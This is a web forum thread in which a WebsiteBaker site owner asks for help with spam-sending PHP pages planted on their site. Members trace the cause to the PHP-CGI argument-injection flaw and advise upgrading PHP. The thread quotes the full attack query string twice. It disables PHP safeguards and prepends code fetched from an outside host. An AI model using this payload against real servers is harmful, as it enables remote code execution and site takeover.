Code injection

[scheltel]

Hi,

Which version of WebsiteBaker is not vulnerable for code injection?

[Argos]

I don't know, but I guess using the last version is always the best way to be most secured.

[scheltel]

I'm using the most recent version but this version is not very secure....

Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:

Code: [Select]

?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log

As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.

What can be done the intercept query string like these?

[Argos]

I'm using the most recent version but this version is not very secure....

Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:

Code: [Select]

?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log

As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.

What can be done the intercept query string like these?

I don't know, but this topic doesn't belong here. I'll move it to the developers forum.

[DarkViper]

I'm using the most recent version but this version is not very secure....
Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:
As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.
What can be done the intercept query string like these?

and what we shall do with this code? Pin it at the wall?
There are more then 500 possibilities to call WB. At which of these request your string of args shall be attatched? Which version/revision of WB? Which module and its version? What's the environment of your server?

Please: If you send a true security hint, then do it in a clear, straight and complete way so we can reproduce the issue.

thanks in advance
Manu.

-------------
[edited by admin: it's "which", not "witch" (=evil woman flying around on a broomstick)  ]

[Ruud]

This is an old security issue of PHP, and has nothing to do with WB.

Have a look here:
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

It is a PHP-CGI vulnerability that should be solved by your host.
Either upgrading to a recent PHP version or changing CGI mode to FastCGI should keep you protected in the future.

[edit: added an extra link with details]

[scheltel]

The query string is attached after het main index.php e.g. http://www.mywebsitebaker.com/index.php

The version of WebsiteBaker is: 2.8.3 [R1638] SP1
Server version: Windows 2008 completely patched
PHP: 5.2.17.17

[scheltel]

Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in query string is ignored.

[Ruud]

Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in query string is ignored.

The bug is tracked back to 2004 in PHP, but only in (the outdated) CGI mode.
One more reason to keep systems updated..

A message to all (future) readers of this thread:

If you feel your website is hacked because of a possible security issue, please use one of the report forms here:
http://www.WebsiteBaker.org/en/community/security-issues.php